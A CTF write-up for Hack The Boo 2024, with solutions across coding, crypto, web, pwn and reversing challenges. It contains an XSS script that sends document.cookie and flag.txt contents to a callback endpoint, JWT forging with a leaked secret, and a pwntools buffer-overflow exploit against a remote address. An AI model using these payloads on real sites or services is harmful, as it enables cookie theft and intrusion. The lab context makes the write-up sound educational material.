Hack The Boo 2024 - Competition
Celebrate Halloween with spooky cybersecurity challenges! Test your skills and join the fun!
Coding
Replacement
MiniMax
Difficulty - Easy
A cursed spell has altered a scroll, changing key letters. Replace the haunted letter with a random one to break the curse!

Code Summary
Inputs: The user provides a string and two values.
Replacement: It replaces all occurrences of the first value in the string with the second value.
Output: The modified string is printed.
import random
user = input()
val1 = input()
val2 = input()
#text = user
#user = user.split()
#rep1 = user.pop(-2)
#rep2 = user.pop(-1)
#text = text.replace(f'{rep1} {rep2}', ' ')
answer = user.replace(val1, val2)
print(answer)
Difficulty - Easy
In a haunted graveyard, spirits hide among the numbers. Can you identify the smallest and largest among them before they vanish ?

Code Summary
Input: The user inputs a string of numbers separated by spaces.
Conversion: It converts the string into a list of floats, ignoring any empty values.
Sorting: The list of numbers is sorted.
Finding Extremes:
least
: The smallest number in the list.highest
: The largest number in the list.
Output: It prints the smallest and largest numbers.
text = input()
numbers = [float(x) for x in text.split() if x.strip()]
numbers.sort()
least = numbers[0]
highest = numbers[len(numbers)-1]
print(least)
print(highest)
Crypto
binary basis
hybrid unifier
Difficulty - Easy
In the depths of an old tomb, a cryptic puzzle guarded a powerful relic. Many had attempted to break its code, but none had succeeded. This time, a daring cryptographer discovered a faint inscription on the wall—a clue, seemingly meaningless, about pairs and shadows of two. As they delved into the cipher, the hint began to make sense, guiding their steps through the labyrinth of numbers. But as the final secret unraveled, the crypt echoed with a low whisper: "Some things are better left in darkness." The relic was revealed, but the curse had only just begun.
This code attempts to recover a flag encrypted with RSA using a provided set of parameters. Let's break down its main steps and purpose:
Parameter Extraction: It reads values of n (modulus), e (public exponent), c (ciphertext), and an extra variable
treat
from anoutput.txt
file.Prime Factor Recovery:
The code aims to retrieve the prime factors of n from
treat
by extracting prime numbers using bit shifts and modulus operations. These primes are likely used to reconstruct n, representing an RSA modulus.
Private Key Calculation:
Using the recovered prime factors, the code computes ϕ(n)\phi(n)ϕ(n) (Euler's totient), which is essential for calculating the RSA private key, d, as the modular inverse of e modulo ϕ(n)\phi(n)ϕ(n).
Decryption of Ciphertext:
Finally, the ciphertext ccc is decrypted using the private key d to get the original message m.
long_to_bytes
converts the integer message m into a byte string, assumed to be the flag.
Points of Consideration
Prime Calculation: The code for
treat
likely assumes some specific RSA key generation behavior, such as primes structured in a certain way. Make sure this operation aligns with the actual RSA key structure for the encryption scheme.Error Handling: Adding error handling for file reading and modular inversions (in case of issues with
inverse
) can help avoid runtime errors.
from Crypto.Util.number import long_to_bytes, inverse
from math import prod
# Read the values from output.txt
with open('output.txt', 'r') as f:
lines = f.readlines()
n = int(lines[0].split('=')[1].strip())
e = int(lines[1].split('=')[1].strip())
c = int(lines[2].split('=')[1].strip())
treat = int(lines[3].split('=')[1].strip())
# Recover the prime factors from 'treat'
primes = []
for i in range(16):
prime = (treat // (2**(0x1337 - 158*(2*i + 1)))) % (2**128)
primes.append(prime)
# Calculate private key 'd'
phi_n = prod([p-1 for p in primes])
d = inverse(e, phi_n)
# Decrypt the ciphertext
m = pow(c, d, n)
flag = long_to_bytes(m)
print(f"Decrypted Flag: {flag.decode('utf-8')}")
Decrypted Flag: HTB{hiding_primes_in_powers_of_two_like_an_amateur}
Difficulty - Easy
In the depths of an ancient library, an old manuscript held the key to an unseen power. Scholars who dared to unlock its secrets would first exchange a series of encrypted symbols, forming a bond no one could break. As they secured their connection, layers of protection wrapped around them like invisible chains. But as the final cipher was set, a chilling realization struck—the connection they forged was now bound to something far darker, something watching from the shadows.
Purpose: The code connects to a server, performs a Diffie-Hellman key exchange to securely share a session key, receives a challenge, and uses the session key to request a "flag" (a secret message).
Main Steps:
Request Session Parameters (request_session_parameters
):
Connects to the server and requests Diffie-Hellman parameters, ggg and ppp, which are used to create a secure key exchange.
Initialize Session and Key Exchange (init_session
):
The client generates its own private and public keys and shares the public key with the server.
Receives the server’s public key, then combines it with the client’s private key to calculate a shared session key.
Hashes this session key using SHA-256 to produce a secure encryption key.
Request Challenge (request_challenge
):
Requests an encrypted challenge from the server, which is then decoded and used to authenticate the session.
Authenticate and Request Flag (access_secret
):
Decrypts the Challenge: Uses the session key and AES decryption to decode the server's challenge.
Create and Send Action Packet: Encrypts a message asking for the "flag" (secret message) and sends it to the server.
Decrypt the Flag: Receives the encrypted flag, then uses the session key to decrypt it and finally displays it.
Error Handling: If any step fails (like an error response from the server), it prints an error message.
This code sets up a secure communication session with a server, authenticates with it, and retrieves a secret message by following a sequence of encrypted requests and responses. The steps include key exchange, encryption, decryption, and communication with server APIs to ensure data is securely transferred.
import requests
from Crypto.Util.number import getPrime, inverse, long_to_bytes
from Crypto.Random import random
from hashlib import sha256
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
import base64
import os
# Base URL for the server - Update with the correct IP and port
BASE_URL = 'http://94.237.63.207:50476' # Updated IP and port
# Step 1: Request Diffie-Hellman parameters from the server
def request_session_parameters():
response = requests.post(f'{BASE_URL}/api/request-session-parameters')
params = response.json()
g = int(params['g'], 16)
p = int(params['p'], 16)
return g, p
# Step 2: Initialize session and establish session key
def init_session(g, p):
# Generate client private and public keys
client_private = random.randint(2, p - 2)
client_public = pow(g, client_private, p)
response = requests.post(f'{BASE_URL}/api/init-session', json={
'client_public_key': client_public
})
result = response.json()
if result['status_code'] == 200:
server_public_key = int(result['server_public_key'], 16)
session_key = pow(server_public_key, client_private, p)
return sha256(str(session_key).encode()).digest()
else:
raise Exception(result.get('error', 'Session initialization failed'))
# Step 3: Request encrypted challenge
def request_challenge():
response = requests.post(f'{BASE_URL}/api/request-challenge')
return response.json()['encrypted_challenge']
# Step 4: Authenticate and request flag
def access_secret(session_key, encrypted_challenge):
# Decrypt the challenge
decoded_challenge = base64.b64decode(encrypted_challenge)
iv, encrypted_data = decoded_challenge[:16], decoded_challenge[16:]
cipher = AES.new(session_key, AES.MODE_CBC, iv)
challenge = unpad(cipher.decrypt(encrypted_data), 16)
challenge_hash = sha256(challenge).hexdigest()
# Encrypt packet with 'flag' action
action = 'flag'
iv = os.urandom(16)
cipher = AES.new(session_key, AES.MODE_CBC, iv)
encrypted_packet = iv + cipher.encrypt(pad(action.encode(), 16))
encrypted_packet_b64 = base64.b64encode(encrypted_packet).decode()
# Send the packet to request the flag
response = requests.post(f'{BASE_URL}/api/dashboard', json={
'challenge': challenge_hash,
'packet_data': encrypted_packet_b64
})
flag_response = response.json()
# Decrypt and return the flag
flag_packet = flag_response['packet_data']
flag_packet = base64.b64decode(flag_packet)
iv, encrypted_flag = flag_packet[:16], flag_packet[16:]
cipher = AES.new(session_key, AES.MODE_CBC, iv)
flag = unpad(cipher.decrypt(encrypted_flag), 16)
return flag.decode()
# Client execution
try:
g, p = request_session_parameters()
session_key = init_session(g, p)
encrypted_challenge = request_challenge()
flag = access_secret(session_key, encrypted_challenge)
print("Flag:", flag)
except Exception as e:
print("An error occurred:", e)
Flag: HTB{good_job_in_alpha_testing_our_protocol___take_this_flag_as_a_gift_1d565319efb97159c1a8373e83e8c734}
Web
WayWitch
Cursed Stale Policy
Difficulty - Easy
NOTE: Access through https://[IP]:[PORT]/
Hidden in the shadows, a coven of witches communicates through arcane tokens, their messages cloaked in layers of dark enchantments. These enchanted tokens safeguard their cryptic conversations, masking sinister plots that threaten to unfold under the veil of night. However, whispers suggest that their protective spells are flawed, allowing outsiders to forge their own charms. Can you exploit the weaknesses in their mystical seals, craft a token of your own, and infiltrate their circle to thwart their nefarious plans before the next moon rises ?
First, you need to grab the cookie session token from the website using Burp.

We already saw a secret key in the source code.
const secretKey = await crypto.subtle.importKey(
"raw",
new TextEncoder().encode("halloween-secret"),
{ name: "HMAC", hash: "SHA-256" },
false,
["sign"],

Now copy the session token and go to the official jwt.io website.

Put your token in the encoded section, change your username from '"guest_1234" to "admin", Now copy the encoded token again, and do not click on the secret base64 encoded option.
Now go back to the challenge website again and add /tickets
.

Go to the storage section, remove the old value of the session token, and paste the new value from the JWT website.

Then just refresh the website; now we can see the flag or press Ctrl + F to find 'HTB{'.
Difficulty - Easy
In the darkest corners of the haunted web lies a forsaken domain ensnared by the Curse Stale Policy. This eerie enchantment was crafted to repel unwelcome scripts using ever-changing magical wards. Yet, tales from bold adventurers whisper of a flaw in this spectral defense. The protective incantations, meant to renew with each heartbeat, are in fact stagnant and stale, repeating the same old verse. The specter's supposed dynamic charms have become predictable echoes, their once-mighty power diminished by the passage of time. Can you exploit this overlooked vulnerability, breach the stagnant barrier, and uncover the secrets hidden within before the specter realizes his oversight ?
First, you need to find the nonce value from the source code. Just use Ctrl + U
to open the source, and then find the value using Ctrl + F
.
nonce=d5810f4350d5cd0fe4fe85577a5696c0
Just copy the value.

I'm using a script to get the request history.
<script nonce="">
fetch('/callback', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ cookies: document.cookie })
});
fetch('../flag.txt', {
method: 'GET'
}).then(response => response.text())
.then(flag => {
fetch('/callback', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ flag: flag })
});
});
</script>
The nonce value is dynamic, so add your nonce value to get the request history.
Just trigger the bot and scroll down; you will find the request history. Open any history, and you will find the flag.


Hehe, here is your flag.
flag=HTB{br0k3_th3_sp3cter's_st4l3_curs3_99bc971d39331997c24e0f711743419a}
Pwn
El Pipo
El Mundo
Difficulty - Easy
Visit the challenge website, put this in the submit section and click on Submit, you can find the flag easily.
Iciesepac mivu tidime, tasecid apezari ayili esirahen tel naholod. Lomaci eser sate la ore so bin. Qur peliril iela rocis cicod cul? Rit rator burame xie riepecit alore goced esibet efi. Efeger olelod ico ifatapa.
Wavete aniey iyiebere yevihit so gatelu enetefu, mir anicemie acasole negeye opoquvan? Po remo enimie tinolan zo rarusam rena. Hie pune emonacu ewive tanina sese lapaga. Sitisef ce renope can nu loli! Ferap nap na utar isorico val pebon pih: Ceriner otero hin rucec. Na de diyulec alilero veso lareye say tieliref. Ma ubotiha petie atilid ehar diteneh nur si ki. Wo wenune emobodes rah iesonet rihol tem zayole utehitig. Sir reyiebe riw pela yusi gulanieg nis, ihiro ciehol nahanor bitonis cuke, bare pimeti ri cieya ce egenecad opewe leti lale ranata. Esurunen yelam lim ebo mav rucimar boses yusar diehed votonut. Hogo ofarerat lemit te. Camo yurime iesog rane la tenoce cen mo ras.
Vemilic osipa nulecas; ala lifi ronoyan risadip ikape peyobe. Temohiel hahes licos uyo ta ceni necadi emoseg cinama cotol. Niteb gor eferif ison cisir do ciere cadehus, ilirorit rosemen gaw pomap ina. Si tonon cielelit diehedi mo. Ate ritaleg utiliror. Ren gimenes emadahe muco abasa uhihe tidedun suyero, diebet pucew egasa unet kire; pone esiniede mane asetac omoc exoresen gi ben rotate tieheh, derexen etodadi bel panidep tulas delel xopin iniem ti.

Here is your flag.
Difficulty - Easy
Here is the script to grab the flag.
Setup: The script sets up an environment using
pwn
for local or remote interaction.Configurations:
Sets
LOCAL
to determine if it should run locally or remotely.Default IP and port values are set, with command-line options for remote adjustments.
Payload Construction:
Defines a
read_flag
function address and creates a payload to overflow and call it.
Execution:
Sends the payload, waits for a response, and searches for the flag (
HTB
) in the response.
Output:
Prints the flag if found; otherwise, it indicates that no flag was retrieved.
This script is structured to handle both local and remote testing, automating payload delivery and response parsing for flag capture.
Running solver remotely at 94.237.54.201 46317
Sending payload...
Payload sent. Now reading server response...
Server response after payload:
[Addr] | [Value]
-------------------+-------------------
0x00007ffd79468d10 | 0x4141414141414141 <- Start of buffer (You write here from right to left)
0x00007ffd79468d18 | 0x4141414141414141
0x00007ffd79468d20 | 0x4141414141414141
0x00007ffd79468d28 | 0x4141414141414141
0x00007ffd79468d30 | 0x4141414141414141 <- Local Variables
0x00007ffd79468d38 | 0x0000000000000041 <- Local Variables (nbytes read receives)
0x00007ffd79468d40 | 0x4141414141414141 <- Saved rbp
0x00007ffd79468d48 | 0x00000000004016b7 <- Saved return address
0x00007ffd79468d50 | 0x00007ff3a41ea50a
0x00007ffd79468d58 | 0x00007ffd79468e68
[!] You changed the return address!
[Addr] | [Value]
-------------------+-------------------
0x00007ffd79468d10 | 0x4141414141414141 <- Start of buffer (You write here from right to left)
0x00007ffd79468d18 | 0x4141414141414141
0x00007ffd79468d20 | 0x4141414141414141
0x00007ffd79468d28 | 0x4141414141414141
0x00007ffd79468d30 | 0x4141414141414141 <- Local Variables
0x00007ffd79468d38 | 0x0000000000000041 <- Local Variables (nbytes read receives)
0x00007ffd79468d40 | 0x4141414141414141 <- Saved rbp
0x00007ffd79468d48 | 0x00000000004016b7 <- Saved return address
0x00007ffd79468d50 | 0x00007ff3a41ea50a
0x00007ffd79468d58 | 0x00007ffd79468e68
🎉 Congratulations! 🎉
You finished your second challenge! Here is your reward:
HTB{z4_w4rud0o0o0o0_d6acbb2ce3c540b830e779f25e06513e}
Checking for flag in the response...
Flag found in response:
[Addr] | [Value]
-------------------+-------------------
0x00007ffd79468d10 | 0x4141414141414141 <- Start of buffer (You write here from right to left)
0x00007ffd79468d18 | 0x4141414141414141
0x00007ffd79468d20 | 0x4141414141414141
0x00007ffd79468d28 | 0x4141414141414141
0x00007ffd79468d30 | 0x4141414141414141 <- Local Variables
0x00007ffd79468d38 | 0x0000000000000041 <- Local Variables (nbytes read receives)
0x00007ffd79468d40 | 0x4141414141414141 <- Saved rbp
0x00007ffd79468d48 | 0x00000000004016b7 <- Saved return address
0x00007ffd79468d50 | 0x00007ff3a41ea50a
0x00007ffd79468d58 | 0x00007ffd79468e68
[!] You changed the return address!
[Addr] | [Value]
-------------------+-------------------
0x00007ffd79468d10 | 0x4141414141414141 <- Start of buffer (You write here from right to left)
0x00007ffd79468d18 | 0x4141414141414141
0x00007ffd79468d20 | 0x4141414141414141
0x00007ffd79468d28 | 0x4141414141414141
0x00007ffd79468d30 | 0x4141414141414141 <- Local Variables
0x00007ffd79468d38 | 0x0000000000000041 <- Local Variables (nbytes read receives)
0x00007ffd79468d40 | 0x4141414141414141 <- Saved rbp
0x00007ffd79468d48 | 0x00000000004016b7 <- Saved return address
0x00007ffd79468d50 | 0x00007ff3a41ea50a
0x00007ffd79468d58 | 0x00007ffd79468e68
🎉 Congratulations! 🎉
You finished your second challenge! Here is your reward:
HTB{z4_w4rud0o0o0o0_d6acbb2ce3c540b830e779f25e06513e}
#!/usr/bin/python3
from pwn import *
import warnings
import os
import sys
warnings.filterwarnings('ignore')
context.log_level = 'critical'
fname = './el_mundo'
LOCAL = False
# Check if the file exists
if not os.path.isfile(fname):
print(f"Error: File '{fname}' not found.")
exit()
os.system('clear')
# Default IP and PORT
IP = '94.237.54.201'
PORT = 46317
if LOCAL:
print('Running solver locally..\n')
r = process(fname)
else:
IP = str(sys.argv[1]) if len(sys.argv) >= 2 else IP
PORT = int(sys.argv[2]) if len(sys.argv) >= 3 else PORT
r = remote(IP, PORT)
print(f'Running solver remotely at {IP} {PORT}\n')
e = ELF(fname)
nbytes = 56
read_flag_addr = 0x4016b7
# Send payload
print("Sending payload...")
r.sendlineafter('> ', b'A' * nbytes + p64(read_flag_addr))
# Read all output after sending the payload
print("Payload sent. Now reading server response...")
response = r.recv(timeout=2)
print("Server response after payload:")
print(response.decode())
# Attempt to read the flag directly from response
print("Checking for flag in the response...")
if b'HTB' in response:
print('Flag found in response:', response.decode())
else:
print("No flag found in the initial response.")
# Close the connection
r.close()
Reversing
LinkHands
Terrorfryer
Difficulty - Easy
I was just trying to check if xxd
works, but the reverse challenge is very easy, and we can see the flag easily.
00003050: 0000 0000 0000 0000 7d00 0000 0000 0000 ........}.......
00003060: 0000 0000 0000 0000 5f00 0000 0000 0000 ........_.......
00003070: 8040 4000 0000 0000 6300 0000 0000 0000 .@@.....c.......
00003080: 9040 4000 0000 0000 6800 0000 0000 0000 .@@.....h.......
00003090: a040 4000 0000 0000 3400 0000 0000 0000 .@@.....4.......
000030a0: b040 4000 0000 0000 3100 0000 0000 0000 .@@.....1.......
000030b0: c040 4000 0000 0000 6e00 0000 0000 0000 .@@.....n.......
000030c0: d040 4000 0000 0000 5f00 0000 0000 0000 .@@....._.......
000030d0: e040 4000 0000 0000 3000 0000 0000 0000 .@@.....0.......
000030e0: f040 4000 0000 0000 6500 0000 0000 0000 .@@.....e.......
000030f0: 0041 4000 0000 0000 3300 0000 0000 0000 .A@.....3.......
00003100: 1041 4000 0000 0000 3400 0000 0000 0000 .A@.....4.......
00003110: 2041 4000 0000 0000 3300 0000 0000 0000 A@.....3.......
00003120: 3041 4000 0000 0000 6600 0000 0000 0000 0A@.....f.......
00003130: 4041 4000 0000 0000 3500 0000 0000 0000 @A@.....5.......
00003140: 5041 4000 0000 0000 3300 0000 0000 0000 PA@.....3.......
00003150: 6041 4000 0000 0000 3700 0000 0000 0000 `A@.....7.......
00003160: 7041 4000 0000 0000 6500 0000 0000 0000 pA@.....e.......
00003170: 8041 4000 0000 0000 6200 0000 0000 0000 .A@.....b.......
00003180: 5040 4000 0000 0000 6300 0000 0000 0000 P@@.....c.......
00003190: a041 4000 0000 0000 4800 0000 0000 0000 .A@.....H.......
000031a0: b041 4000 0000 0000 5400 0000 0000 0000 .A@.....T.......
000031b0: c041 4000 0000 0000 4200 0000 0000 0000 .A@.....B.......
000031c0: d041 4000 0000 0000 7b00 0000 0000 0000 .A@.....{.......
000031d0: e041 4000 0000 0000 3400 0000 0000 0000 .A@.....4.......
000031e0: f041 4000 0000 0000 5f00 0000 0000 0000 .A@....._.......
000031f0: 0042 4000 0000 0000 6200 0000 0000 0000 .B@.....b.......
00003200: 1042 4000 0000 0000 7200 0000 0000 0000 .B@.....r.......
00003210: 2042 4000 0000 0000 3300 0000 0000 0000 B@.....3.......
00003220: 3042 4000 0000 0000 3400 0000 0000 0000 0B@.....4.......
00003230: 4042 4000 0000 0000 6b00 0000 0000 0000 @B@.....k.......
00003240: 5042 4000 0000 0000 5f00 0000 0000 0000 PB@....._.......
00003250: 6042 4000 0000 0000 3100 0000 0000 0000 `B@.....1.......
00003260: 7042 4000 0000 0000 6e00 0000 0000 0000 pB@.....n.......
00003270: 8042 4000 0000 0000 5f00 0000 0000 0000 .B@....._.......
00003280: 9042 4000 0000 0000 7400 0000 0000 0000 .B@.....t.......
00003290: a042 4000 0000 0000 6800 0000 0000 0000 .B@.....h.......
000032a0: 6040 4000 0000 0000 3300 0000 0000 0000 `@@.....3.......
}_ch41n_0e343f537ebcHTB{4_br34k_1n_th3
We just need to rearrange the flag's format.
HTB{4_br34k_1n_th3_ch41n_0e343f537ebc}
Here is your flag.
Difficulty - Easy
It's an easy challenge, but I rate it as medium level.
Code Summary
Functions:
encontrar_indices(alfabeto, cadena)
: Finds the positions of characters fromalfabeto
incadena
and returns their indices.reinventar(resultado, alfabeto)
: Uses the indices to create a new string fromalfabeto
.
Process:
Takes an
alfabeto
and a scrambled version of it.Finds where each character appears and returns their indices.
Rearranges a secret string using those indices.
Example:
def encontrar_indices(alfabeto, cadena):
indices = [' '] * len(cadena)
for ind in range(len(alfabeto)):
indice = cadena.find(alfabeto[ind])
if indice != -1:
indices[ind] = indice
else:
indices[ind] = None # Si la letra no está en la cadena
return indices
def reinventar(resultado, alfabeto):
cadena_real = ''
for i in resultado:
cadena_real += alfabeto[i]
return cadena_real
# Solicitar alfabeto y cadena al usuario
alfabeto = "123456789qwertyuiopasdfghjklzxcvbnm!@#${^&*()_+>"
print("\nAlfabeto:\n"+alfabeto+'\n')
alfabeto_revuelto = "_jn#>kt{u!2w4e^ps1z)bfahm+5yq@73*ir9$8lg(x6covd&"
print("Alfabeto revuelto:\n"+alfabeto_revuelto+'\n')
# Obtener los índices de las letras del alfabeto en la cadena
resultados = encontrar_indices(alfabeto, alfabeto_revuelto)
print("Indices del arreglo:")
print(resultados)
print()
cadena_secreta= "1_n3}f3br9Ty{_6_rHnf01fg_14rlbtB60tuarun0c_tr1y3"
print("Cadena Secreta:\n"+cadena_secreta+'\n')
cadena_real = reinventar(resultados, cadena_secreta)
print("Cadena Ordenada:\n"+cadena_real+'\n')
Just run the code, and you will see the decrypted flag value.
┌──(kali㉿kali)-[~/Downloads/HTBCTF]
└─$ python3 rev.py
Alfabeto:
123456789qwertyuiopasdfghjklzxcvbnm!@#${^&*()_+>
Alfabeto revuelto:
_jn#>kt{u!2w4e^ps1z)bfahm+5yq@73*ir9$8lg(x6covd&
Indices del arreglo:
[17, 10, 31, 12, 26, 42, 30, 37, 35, 28, 11, 13, 34, 6, 27, 8, 33, 44, 15, 22, 16, 46, 21, 39, 23, 1, 5, 38, 18, 41, 43, 45, 20, 2, 24, 9, 29, 3, 36, 7, 14, 47, 32, 40, 19, 0, 25, 4]
Cadena Secreta:
1_n3}f3br9Ty{_6_rHnf01fg_14rlbtB60tuarun0c_tr1y3
Cadena Ordenada:
HTB{4_truly_t3rr0r_fry1ng_funct10n_9b3ab6360f11}
Here is your flag.
HTB{4_truly_t3rr0r_fry1ng_funct10n_9b3ab6360f11}
Reversing - LinkHands
┌──(kali㉿kali)-[~/Downloads/HTBCTF/rev/rev_linkhands]
└─$ xxd link
00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000 .ELF............
00000010: 0200 3e00 0100 0000 b010 4000 0000 0000 ..>.......@.....
00000020: 4000 0000 0000 0000 d833 0000 0000 0000 @........3......
00000030: 0000 0000 4000 3800 0d00 4000 1c00 1b00 ....@.8...@.....
00000040: 0600 0000 0400 0000 4000 0000 0000 0000 ........@.......
00000050: 4000 4000 0000 0000 4000 4000 0000 0000 @.@.....@.@.....
00000060: d802 0000 0000 0000 d802 0000 0000 0000 ................
00000070: 0800 0000 0000 0000 0300 0000 0400 0000 ................
00000080: 1803 0000 0000 0000 1803 4000 0000 0000 ..........@.....
00000090: 1803 4000 0000 0000 1c00 0000 0000 0000 ..@.............
000000a0: 1c00 0000 0000 0000 0100 0000 0000 0000 ................
000000b0: 0100 0000 0400 0000 0000 0000 0000 0000 ................
000000c0: 0000 4000 0000 0000 0000 4000 0000 0000 ..@.......@.....
000000d0: f007 0000 0000 0000 f007 0000 0000 0000 ................
000000e0: 0010 0000 0000 0000 0100 0000 0500 0000 ................
000000f0: 0010 0000 0000 0000 0010 4000 0000 0000 ..........@.....
00000100: 0010 4000 0000 0000 7d02 0000 0000 0000 ..@.....}.......
00000110: 7d02 0000 0000 0000 0010 0000 0000 0000 }...............
00000120: 0100 0000 0400 0000 0020 0000 0000 0000 ......... ......
00000130: 0020 4000 0000 0000 0020 4000 0000 0000 . @...... @.....
00000140: 5801 0000 0000 0000 5801 0000 0000 0000 X.......X.......
00000150: 0010 0000 0000 0000 0100 0000 0600 0000 ................
00000160: e82d 0000 0000 0000 e83d 4000 0000 0000 .-.......=@.....
00000170: e83d 4000 0000 0000 c804 0000 0000 0000 .=@.............
00000180: e804 0000 0000 0000 0010 0000 0000 0000 ................
00000190: 0200 0000 0600 0000 f82d 0000 0000 0000 .........-......
000001a0: f83d 4000 0000 0000 f83d 4000 0000 0000 .=@......=@.....
000001b0: d001 0000 0000 0000 d001 0000 0000 0000 ................
000001c0: 0800 0000 0000 0000 0400 0000 0400 0000 ................
000001d0: 3803 0000 0000 0000 3803 4000 0000 0000 8.......8.@.....
000001e0: 3803 4000 0000 0000 4000 0000 0000 0000 8.@.....@.......
000001f0: 4000 0000 0000 0000 0800 0000 0000 0000 @...............
00000200: 0400 0000 0400 0000 7803 0000 0000 0000 ........x.......
00000210: 7803 4000 0000 0000 7803 4000 0000 0000 x.@.....x.@.....
00000220: 4400 0000 0000 0000 4400 0000 0000 0000 D.......D.......
00000230: 0400 0000 0000 0000 53e5 7464 0400 0000 ........S.td....
00000240: 3803 0000 0000 0000 3803 4000 0000 0000 8.......8.@.....
00000250: 3803 4000 0000 0000 4000 0000 0000 0000 8.@.....@.......
00000260: 4000 0000 0000 0000 0800 0000 0000 0000 @...............
00000270: 50e5 7464 0400 0000 9c20 0000 0000 0000 P.td..... ......
00000280: 9c20 4000 0000 0000 9c20 4000 0000 0000 . @...... @.....
00000290: 2c00 0000 0000 0000 2c00 0000 0000 0000 ,.......,.......
000002a0: 0400 0000 0000 0000 51e5 7464 0600 0000 ........Q.td....
000002b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000002c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000002d0: 0000 0000 0000 0000 1000 0000 0000 0000 ................
000002e0: 52e5 7464 0400 0000 e82d 0000 0000 0000 R.td.....-......
000002f0: e83d 4000 0000 0000 e83d 4000 0000 0000 .=@......=@.....
00000300: 1802 0000 0000 0000 1802 0000 0000 0000 ................
00000310: 0100 0000 0000 0000 2f6c 6962 3634 2f6c ......../lib64/l
00000320: 642d 6c69 6e75 782d 7838 362d 3634 2e73 d-linux-x86-64.s
00000330: 6f2e 3200 0000 0000 0400 0000 3000 0000 o.2.........0...
00000340: 0500 0000 474e 5500 0280 00c0 0400 0000 ....GNU.........
00000350: 0100 0000 0000 0000 0100 01c0 0400 0000 ................
00000360: 0100 0000 0000 0000 0200 01c0 0400 0000 ................
00000370: 0000 0000 0000 0000 0400 0000 1400 0000 ................
00000380: 0300 0000 474e 5500 998c 1a51 1ccf 0a80 ....GNU....Q....
00000390: eec3 ed30 dab3 331c e2cf 9f7f 0400 0000 ...0..3.........
000003a0: 1000 0000 0100 0000 474e 5500 0000 0000 ........GNU.....
000003b0: 0400 0000 0400 0000 0000 0000 0000 0000 ................
000003c0: 0200 0000 0d00 0000 0100 0000 0600 0000 ................
000003d0: 0000 2000 8001 1000 0d00 0000 0e00 0000 .. .............
000003e0: 291d 8c1c 6755 6110 0000 0000 0000 0000 )...gUa.........
000003f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000400: 2800 0000 1200 0000 0000 0000 0000 0000 (...............
00000410: 0000 0000 0000 0000 3700 0000 1200 0000 ........7.......
00000420: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000430: 9c00 0000 2000 0000 0000 0000 0000 0000 .... ...........
00000440: 0000 0000 0000 0000 1200 0000 1200 0000 ................
00000450: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000460: 1700 0000 1200 0000 0000 0000 0000 0000 ................
00000470: 0000 0000 0000 0000 4900 0000 1200 0000 ........I.......
00000480: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000490: 5000 0000 1200 0000 0000 0000 0000 0000 P...............
000004a0: 0000 0000 0000 0000 0100 0000 1200 0000 ................
000004b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000004c0: 0d00 0000 1200 0000 0000 0000 0000 0000 ................
000004d0: 0000 0000 0000 0000 b800 0000 2000 0000 ............ ...
000004e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000004f0: 5700 0000 1200 0000 0000 0000 0000 0000 W...............
00000500: 0000 0000 0000 0000 c700 0000 2000 0000 ............ ...
00000510: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000520: 3000 0000 1100 1900 b042 4000 0000 0000 0........B@.....
00000530: 0800 0000 0000 0000 0700 0000 1100 1900 ................
00000540: c042 4000 0000 0000 0800 0000 0000 0000 .B@.............
00000550: 0066 6765 7473 0073 7464 696e 0070 7574 .fgets.stdin.put
00000560: 6300 7075 7473 005f 5f73 7461 636b 5f63 c.puts.__stack_c
00000570: 686b 5f66 6169 6c00 7075 7463 6861 7200 hk_fail.putchar.
00000580: 7374 646f 7574 005f 5f6c 6962 635f 7374 stdout.__libc_st
00000590: 6172 745f 6d61 696e 0073 7472 6368 7200 art_main.strchr.
000005a0: 7072 696e 7466 005f 5f69 736f 6339 395f printf.__isoc99_
000005b0: 7373 6361 6e66 006c 6962 632e 736f 2e36 sscanf.libc.so.6
000005c0: 0047 4c49 4243 5f32 2e37 0047 4c49 4243 .GLIBC_2.7.GLIBC
000005d0: 5f32 2e34 0047 4c49 4243 5f32 2e33 3400 _2.4.GLIBC_2.34.
000005e0: 474c 4942 435f 322e 322e 3500 5f49 544d GLIBC_2.2.5._ITM
000005f0: 5f64 6572 6567 6973 7465 7254 4d43 6c6f _deregisterTMClo
00000600: 6e65 5461 626c 6500 5f5f 676d 6f6e 5f73 neTable.__gmon_s
00000610: 7461 7274 5f5f 005f 4954 4d5f 7265 6769 tart__._ITM_regi
00000620: 7374 6572 544d 436c 6f6e 6554 6162 6c65 sterTMCloneTable
00000630: 0000 0000 0200 0300 0100 0200 0400 0200 ................
00000640: 0200 0200 0200 0100 0500 0100 0200 0200 ................
00000650: 0100 0400 6700 0000 1000 0000 0000 0000 ....g...........
00000660: 1769 690d 0000 0500 7100 0000 1000 0000 .ii.....q.......
00000670: 1469 690d 0000 0400 7b00 0000 1000 0000 .ii.....{.......
00000680: b491 9606 0000 0300 8500 0000 1000 0000 ................
00000690: 751a 6909 0000 0200 9000 0000 0000 0000 u.i.............
000006a0: c83f 4000 0000 0000 0600 0000 0200 0000 .?@.............
000006b0: 0000 0000 0000 0000 d03f 4000 0000 0000 .........?@.....
000006c0: 0600 0000 0300 0000 0000 0000 0000 0000 ................
000006d0: d83f 4000 0000 0000 0600 0000 0a00 0000 .?@.............
000006e0: 0000 0000 0000 0000 e03f 4000 0000 0000 .........?@.....
000006f0: 0600 0000 0c00 0000 0000 0000 0000 0000 ................
00000700: b042 4000 0000 0000 0500 0000 0d00 0000 .B@.............
00000710: 0000 0000 0000 0000 c042 4000 0000 0000 .........B@.....
00000720: 0500 0000 0e00 0000 0000 0000 0000 0000 ................
00000730: 0040 4000 0000 0000 0700 0000 0100 0000 .@@.............
00000740: 0000 0000 0000 0000 0840 4000 0000 0000 .........@@.....
00000750: 0700 0000 0400 0000 0000 0000 0000 0000 ................
00000760: 1040 4000 0000 0000 0700 0000 0500 0000 .@@.............
00000770: 0000 0000 0000 0000 1840 4000 0000 0000 .........@@.....
